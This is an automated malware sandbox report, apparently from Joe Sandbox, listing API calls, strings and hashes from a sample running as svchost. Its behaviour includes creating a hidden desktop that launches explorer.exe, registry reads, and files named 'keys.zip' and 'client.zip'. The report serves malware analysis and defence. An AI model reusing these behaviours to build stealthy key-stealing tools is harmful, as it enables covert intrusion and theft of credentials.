Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleProcess$CloseInformationOpenTimes
String ID:
API String ID: 3228293703-0
Opcode ID: 74d2c5d0289e147a554c2e2df2393a89a28dd9d4837a4e901b2f3e514c150298
Instruction ID: 00ae0e0cd36ab9f62e51b22f890fa0752f49c87762c8a4faa31451496eada84c
Opcode Fuzzy Hash: 74d2c5d0289e147a554c2e2df2393a89a28dd9d4837a4e901b2f3e514c150298
Instruction Fuzzy Hash: EE110A71D51228AB8B11DFD58888AEEBBBCBB4CB10F14468AF955B3240D7715A058BE1

Function 02C86290 Relevance: 6.0, APIs: 4, Instructions: 27threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,02C85890,00000000,00000000,00000000), ref: 02C862A4
GetHandleInformation.KERNEL32(00000000,?), ref: 02C862BC
CloseHandle.KERNEL32(00000000), ref: 02C862CD
ExitThread.KERNEL32 ref: 02C862D5

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleThread$CloseCreateExitInformation
String ID:
API String ID: 4233414108-0
Opcode ID: d328a97ac5bed89f73c61e0b3d1f8b3cad970d3428fa4f8c58baed391d3095c6
Instruction ID: d8b473da1fd9b586a227525e106e6f6449cad00aa78bfcce2198c722376e50d6
Opcode Fuzzy Hash: d328a97ac5bed89f73c61e0b3d1f8b3cad970d3428fa4f8c58baed391d3095c6
Instruction Fuzzy Hash: CFE09B30EC1358B7F3219750DC0EF5A7A5C9F01B0AF2441D0F905A71C0C7F0A6108665

Function 02C835A0 Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,7D2DE31Fa,00000000,00000001,?,00000104), ref: 02C762D2
Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C835F8
HeapValidate.KERNEL32(00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C835FB
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C83608
HeapFree.KERNEL32(00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C8360B

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
String ID:
API String ID: 789118668-0
Opcode ID: 6ac6e39874d9b8a87fc39220fb479dd2fe0c69e0d2da136d3b06b31e35e5977b
Instruction ID: bf5478c376627f2509143d8bfa76f969eb437a9b52595ec0a6831fcc23554143
Opcode Fuzzy Hash: 6ac6e39874d9b8a87fc39220fb479dd2fe0c69e0d2da136d3b06b31e35e5977b
Instruction Fuzzy Hash: 23012431F892801ADF116B3D686073AABDA9FC2968B0C92DAE446C7280D722C9008340

Function 02C97090 Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,00000000,?,?,02C975F3), ref: 02C970CF

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e0b0319cb903f30aaee89296e4cc31b7d61303c5611d790538c0c254949ea6e6
Instruction ID: 0c918c480530b2e208f2bf5f63c3885e27971d0dfa48691c777c5f3d850b4b0e
Opcode Fuzzy Hash: e0b0319cb903f30aaee89296e4cc31b7d61303c5611d790538c0c254949ea6e6
Instruction Fuzzy Hash: 5811E9B2A413445BDB209E6DECC576AF7ECEB84225F1009BEE949C3640C37199448650

Function 02C72930 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 02C7293F
exit.MSVCRT ref: 02C72950
free.MSVCRT ref: 02C72993

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: callocexitfree
String ID:
API String ID: 3367576030-0
Opcode ID: 0f0cf4d178bcc210f5dc5721167d9b50273371881535febb34f9f0f099658dd9
Instruction ID: 000e5a7d30da90e0a151403ee1b5ecb3026ebeb8182f7ae249b2a5586dc08dfa
Opcode Fuzzy Hash: 0f0cf4d178bcc210f5dc5721167d9b50273371881535febb34f9f0f099658dd9
Instruction Fuzzy Hash: E6018476600159ABD7118F4ADC80F9B7BA9EF88750F040518FE0587301C771D911CBE6

Function 02C88F70 Relevance: 4.5, APIs: 3, Instructions: 24threadmemoryCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 02C88F7E
SetThreadPriority.KERNEL32(00000000), ref: 02C88F85
VirtualProtect.KERNEL32(02C890E0,00000008,00000000,02C890E0), ref: 02C88F9F

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Thread$CurrentPriorityProtectVirtual
String ID:
API String ID: 1494777729-0
Opcode ID: 75b85df2a244b49084cb9c6be1fee03f6b29c8988f75ef377feece3f958ed39b
Instruction ID: 3d072e8d0ad7959a8a5fc85f18e2cf0cd3f70cfa6d2a8bf5e3b67d3b8feb11de
Opcode Fuzzy Hash: 75b85df2a244b49084cb9c6be1fee03f6b29c8988f75ef377feece3f958ed39b
Instruction Fuzzy Hash: 7AE0E5B6E40259EBCF01DFD8E845E9DB778FB48321F008659F915A7240C735A914CB60

Function 02C82CE0 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,02C7FB17,02C7FB03,?,02C87515,?,?,?), ref: 02C82CF1
RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02C82CF8
memset.MSVCRT ref: 02C82D08

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessmemset
String ID:
API String ID: 983300431-0
Opcode ID: 75dbf35bca06dd830f604bb688404d1911218ff929d5c56889fef34081a0ce2d
Instruction ID: e39a6daae8fda8d00c1477b3830d4f8cdadd1efeb8606937784db8c4a3b33ff1
Opcode Fuzzy Hash: 75dbf35bca06dd830f604bb688404d1911218ff929d5c56889fef34081a0ce2d
Instruction Fuzzy Hash: 75E0CD37F4156262C91611197C0CBD76A18CFC1625F254526BE05D71C1EA11C90582B1

Function 0040207A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000), ref: 0040208C

Strings

V,@, xrefs: 00402092

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: V,@
API String ID: 3664257935-3634209070
Opcode ID: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
Instruction ID: d15e959a12f23ccec2fe85088e2afbb8a6d817ea7d7d5b015e5417604cfff27a
Opcode Fuzzy Hash: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
Instruction Fuzzy Hash: 12D05E76E027298BCB20CF94A5052AEF730FB44731F0043AADE257338083351C118AD4

Function 02C95870 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C958C3

Strings

bad pack level, xrefs: 02C95882

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: memset
String ID: bad pack level
API String ID: 2221118986-4081416248
Opcode ID: b03a042e19552a90dd51a5fb2fc4d94929bf84e8aa32e981ceed3f8ed88e5d73
Instruction ID: 37220f5d33abeed525e7f3057d18b49a3e425549acef86b3ea3ab1fe85dddaf4
Opcode Fuzzy Hash: b03a042e19552a90dd51a5fb2fc4d94929bf84e8aa32e981ceed3f8ed88e5d73
Instruction Fuzzy Hash: F731B7F1A047148ED7219FB9D4842E7B7E6FF46360B40493EE1AE96240D379A182CF53

Function 02C95B50 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(0001AF70,00022F70,00008000,0001AF70,02C9595C), ref: 02C95B9F

Strings

more < 2, xrefs: 02C95C30

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: more < 2
API String ID: 3510742995-2484782096
Opcode ID: aa88fe5c378baad28afa086cd2a7c9a55f108c18b7cbbb39190229aadf341f3b
Instruction ID: fa29d854ba3d9dbdf17571427a6aaa4b2709e4821e4193a9d7567c5dea0ee287
Opcode Fuzzy Hash: aa88fe5c378baad28afa086cd2a7c9a55f108c18b7cbbb39190229aadf341f3b
Instruction Fuzzy Hash: 5E3170F1610E008BDB268BB4C4487E673E6BF8A358F944A3DD06B562D4D738A586CE43

Function 02C972B0 Relevance: 3.1, APIs: 2, Instructions: 66fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,00000000,00000068,?,02C974DE,00000068,00000000,00000000,00000000,00000011), ref: 02C972D6
ReadFile.KERNEL32(?,?,00004000,?,00000000,00000000,00000068,?,02C974DE,00000068,00000000,00000000,00000000,00000011), ref: 02C9730C

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: FileReadmemcpy
String ID:
API String ID: 1163090680-0
Opcode ID: 5e4ab89467c45d4ad976b7c18e4999c846afacf179ef1ccbccb903e84aabe7af
Instruction ID: 64d363186c5f4da0c576df7cee4247f317322fc0d375e4a31da46e02b4fe8dde
Opcode Fuzzy Hash: 5e4ab89467c45d4ad976b7c18e4999c846afacf179ef1ccbccb903e84aabe7af
Instruction Fuzzy Hash: B51154B27117045FDB24CA6ADC84A6BF3EDEFD4714B14882DF546C7A40D631E9058B64

Function 02C76A10 Relevance: 3.0, APIs: 2, Instructions: 9fileCOMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(00000000,00000000,02C879AD,82c31d1a,?,?,?,?,?,?), ref: 02C76A18
DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C76A1F

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: b154332f1c2d15c013d7aa7e7efa14e764507d518ea450a32ec213f8197d7345
Instruction ID: 7a1a6bb6f11a735d8f4cbb4645dc26e15627a8d3f55c6b75cf830b046884ff24
Opcode Fuzzy Hash: b154332f1c2d15c013d7aa7e7efa14e764507d518ea450a32ec213f8197d7345
Instruction Fuzzy Hash: A3B092B1DD2CA26B8F135720590CAAEAA1CEE85B017058A84F901D2001DB288A5186A6

Function 02C96FA0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e255b7937325390c97710c5a88782090207b2db64f4130e14b0bf41065bb860b
Instruction ID: c1eb1f6e78f9b7a99b1c8aff115ea89d7a60a05768da011316e2f5c980c18fb3
Opcode Fuzzy Hash: e255b7937325390c97710c5a88782090207b2db64f4130e14b0bf41065bb860b
Instruction Fuzzy Hash: AFF01CB4500200AEEF59CF21C65DF597BE4AB85399F59D0C9E0084F6A2CB39C549DF50

Function 02C766A0 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,00000001,00000001,00000000), ref: 02C766B7

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: f6c50e1ed5c748e22e93158715b2fcabc35f4e39c71c32a3502fd0c458ac892d
Instruction ID: d065e3cc96c4392a53a23273d8844df094d0d0f752270670f2b669e4876b59ef
Opcode Fuzzy Hash: f6c50e1ed5c748e22e93158715b2fcabc35f4e39c71c32a3502fd0c458ac892d
Instruction Fuzzy Hash: D4D0C9B595410CBFE740CB84DD0AFAAB7ECD748701F004299BA08C3240E6B16E109BB6

Function 02C764B0 Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,02C8CCE2), ref: 02C764C3

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d00bf9e2fbff7ed5a6330fb3206c15512381745d3f5a3d9aa4289cf275ea44a3
Instruction ID: 0b7ddcf59c93360b0cbdda4d1ebac2838fe4f6a439e6803e9729be378b494429
Opcode Fuzzy Hash: d00bf9e2fbff7ed5a6330fb3206c15512381745d3f5a3d9aa4289cf275ea44a3
Instruction Fuzzy Hash: F0B001B0FC078176FD725661AF1FF0565286740F05F618A80B389BE0C289E47614862E

Non-executed Functions

Function 02C7C380 Relevance: 103.7, APIs: 55, Strings: 4, Instructions: 429windowsynchronizationmemoryCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 02C7C3DF
SetWindowLongA.USER32(?,000000F0,00000000), ref: 02C7C3EA
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C3FD
GetDlgItem.USER32(?,?), ref: 02C7C412
GetWindowLongA.USER32(00000000,000000EB), ref: 02C7C421
SetWindowTextA.USER32(?,-00000008), ref: 02C7C42D
GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C43C
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C7C447
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C45A
GetDlgItem.USER32(?,000003E9), ref: 02C7C498
GetClassLongA.USER32(00000000,000000E6), ref: 02C7C4A8
SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7C4B7
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02C7C4CF
GetObjectA.GDI32(00000000,0000003C,?), ref: 02C7C4D9
CreateFontIndirectA.GDI32 ref: 02C7C4EF
SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02C7C4FF
GetWindow.USER32(00000000,00000005), ref: 02C7C537
GetWindow.USER32(00000000), ref: 02C7C53A
GetWindowInfo.USER32(00000000,?), ref: 02C7C54E
GetWindowRect.USER32(?,?), ref: 02C7C5B3
SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02C7C5DD
GetClientRect.USER32(?,?), ref: 02C7C5E9
MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02C7C605
CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02C7C62A
SetWindowLongA.USER32(00000000,000000F4,?), ref: 02C7C63C
GetClassLongA.USER32(00000000,000000E6), ref: 02C7C645
SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7C654
GetWindowTextLengthA.USER32(00000000), ref: 02C7C65B
HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02C7C66F
SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02C7C693
SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02C7C6A0
GetWindowThreadProcessId.USER32(00000000,?), ref: 02C7C6B0
GetClassLongA.USER32(00000000,000000DE), ref: 02C7C6CC
GetClassLongA.USER32(00000000,000000F2), ref: 02C7C6D5
LoadIconA.USER32(00000000,00007F00), ref: 02C7C6E1
SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02C7C6FB
GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C724
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C7C733
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C746
GetWindow.USER32(00000000,00000003), ref: 02C7C769
IsIconic.USER32(?), ref: 02C7C787
ShowWindow.USER32(?,00000001), ref: 02C7C794
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7C7A3
ReleaseMutex.KERNEL32(00000000), ref: 02C7C7BB

Part of subcall function 02C7C330: GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7C33C
Part of subcall function 02C7C330: GetCurrentThreadId.KERNEL32 ref: 02C7C344
Part of subcall function 02C7C330: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C7C350
Part of subcall function 02C7C330: SendMessageA.USER32(?,0000000D,?,?), ref: 02C7C361
Part of subcall function 02C7C330: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C7C36D

PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02C7C7C8
GetDlgItem.USER32(?,?), ref: 02C7C837
GetWindowLongA.USER32(00000000), ref: 02C7C83E
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7C84E
ReleaseMutex.KERNEL32(00000000), ref: 02C7C868
GetDlgItem.USER32(?,00000000), ref: 02C7C87D
GetWindowLongA.USER32(00000000,000000EB), ref: 02C7C88C
DeleteObject.GDI32(?), ref: 02C7C898
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C7C8A7
DestroyWindow.USER32(00000000), ref: 02C7C8AE
EndDialog.USER32(?,00000000), ref: 02C7C8C3

Strings

<, xrefs: 02C7C546
static, xrefs: 02C7C623
P0#v, xrefs: 02C7C7BB, 02C7C868
', xrefs: 02C7C750

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
String ID: '$<$P0#v$static
API String ID: 2592195760-1574280343
Opcode ID: ef69f0a1398285c23b71343fc943ffede84846a0e686b3e3f8ebdbed849b94b7
Instruction ID: fd7e9198ded1431252ecc94c8436da75a98c5ce6b82cbdab1c8a503a73804f3d
Opcode Fuzzy Hash: ef69f0a1398285c23b71343fc943ffede84846a0e686b3e3f8ebdbed849b94b7
Instruction Fuzzy Hash: FDE19E71A84341AFD3128F64EC88F6A7BA8FB88725F104F19F51AD72C0CB749A51CB61

Function 02C786C0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 260threadsleepprocessCOMMON

Download Yara Rule

APIs

CreateDesktopA.USER32 ref: 02C78711
SetThreadDesktop.USER32(00000000), ref: 02C7872A
memset.MSVCRT ref: 02C78738
CreateProcessA.KERNEL32 ref: 02C7877C
GetShellWindow.USER32 ref: 02C78788
Sleep.KERNEL32(0000000A), ref: 02C787A2
GetShellWindow.USER32 ref: 02C787A4
GetHandleInformation.KERNEL32(00000000,?), ref: 02C787D3
CloseHandle.KERNEL32(00000000), ref: 02C787E1
GetHandleInformation.KERNEL32(00000000,?), ref: 02C787FB
CloseHandle.KERNEL32(00000000), ref: 02C78809
GetDesktopWindow.USER32 ref: 02C7880F
FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02C78820
RegisterWindowMessageA.USER32(7d2de3ada), ref: 02C78848
CreateThread.KERNEL32(00000000,00000000,Function_000083D0,00000000,00000000,00000000), ref: 02C7885D
SetThreadDesktop.USER32(?), ref: 02C788A7
memset.MSVCRT ref: 02C788B8
CreateProcessA.KERNEL32 ref: 02C78905
GetShellWindow.USER32 ref: 02C78911
Sleep.KERNEL32(0000000A), ref: 02C78924
GetShellWindow.USER32 ref: 02C78926
GetHandleInformation.KERNEL32(?,?), ref: 02C78955
CloseHandle.KERNEL32(?), ref: 02C78963
GetHandleInformation.KERNEL32(00000000,?), ref: 02C7897D
CloseHandle.KERNEL32(00000000), ref: 02C7898B
GetDesktopWindow.USER32 ref: 02C78991
FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02C789A2
CreateThread.KERNEL32(00000000,00000000,Function_000083D0,00000000,00000000,00000000), ref: 02C789CF

Strings

c:\windows, xrefs: 02C78758, 02C788DB
D, xrefs: 02C7876C
7d2de3ada, xrefs: 02C786FC, 02C78774, 02C78826, 02C788FA
Shell_TrayWnd, xrefs: 02C78816, 02C78998
c:\windows\explorer.exe, xrefs: 02C78763, 02C788E6
D, xrefs: 02C788EF

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Handle$CreateDesktop$CloseInformationShellThread$FindProcessSleepmemset$MessageRegister
String ID: 7d2de3ada$D$D$Shell_TrayWnd$c:\windows$c:\windows\explorer.exe
API String ID: 340731545-4072454236
Opcode ID: 6dd0f8fbc857005d8b0945f724dcaca625a5c1f17fb0552f53a02aafc3d7cc02
Instruction ID: 44ee53593746ed547ee0629c9a9b28ec431908d50eb276aea1e373b7e83b79d8
Opcode Fuzzy Hash: 6dd0f8fbc857005d8b0945f724dcaca625a5c1f17fb0552f53a02aafc3d7cc02
Instruction Fuzzy Hash: 029148B1988350AFD312DF65D848B5BBBE8EF88754F108F5AF64983240DB748515CFA2

Function 02C911C0 Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 376COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C911DE
memset.MSVCRT ref: 02C911F8
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C91222
PathAddBackslashA.SHLWAPI(82C31CB5), ref: 02C91247
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02C91287
GetLastError.KERNEL32 ref: 02C91291
IsUserAnAdmin.SHELL32 ref: 02C91299
PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C912AA
SetLastError.KERNEL32(00000000), ref: 02C912B1
GetFileAttributesA.KERNEL32(00000000), ref: 02C912F4
SetCurrentDirectoryA.KERNEL32(00000000), ref: 02C91340
PathAddBackslashA.SHLWAPI(82C31CB5,00000000,00000000), ref: 02C91387

Strings

keys.zip, xrefs: 02C91518
path_client.txt, xrefs: 02C913CB
\SIGN1\, xrefs: 02C9149B
\, xrefs: 02C91319
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02C91609
client.zip, xrefs: 02C912C8
P0#v, xrefs: 02C9162A
path_keys.txt, xrefs: 02C915BB
82C31CB5, xrefs: 02C91242, 02C9124D, 02C91382, 02C9138D, 02C914C2, 02C914CD, 02C91572, 02C9157D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
